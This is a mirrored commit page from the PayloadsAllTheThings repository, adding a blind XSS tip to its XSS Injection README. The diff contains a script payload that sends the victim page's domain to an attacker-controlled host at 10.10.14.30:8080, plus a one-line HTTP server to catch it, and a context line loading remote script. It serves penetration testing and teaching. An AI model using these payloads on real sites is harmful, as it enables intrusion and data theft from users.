ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-20 03:16:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #376 from noraj/patch-2

Browse Source 
XSS: add quick tips for bXSS
This commit is contained in:
Swissky 2021-06-16 13:56:29 +02:00 committed by GitHub
commit 62b897c936
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 16 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
XSS Injection/README.md
View File

@ -452,6 +452,22 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu
- Comment Box - Comment Box
- Administrative Panel - Administrative Panel
### Tips
You can use [Data grabber for XSS](#data-grabber-for-xss) and a one-line HTTP server to confirm the existence of a blind XSS before deploying an heavy blind XSS platform.
Eg. payload
```html
<script>document.location='http://10.10.14.30:8080/XSS/grabber.php?c='+document.domain</script>
```
Eg. one-line HTTP server:
```
$ ruby -run -ehttpd . -p8080
```
## Mutated XSS ## Mutated XSS
Use browsers quirks to recreate some HTML tags when it is inside an `element.innerHTML`. Use browsers quirks to recreate some HTML tags when it is inside an `element.innerHTML`.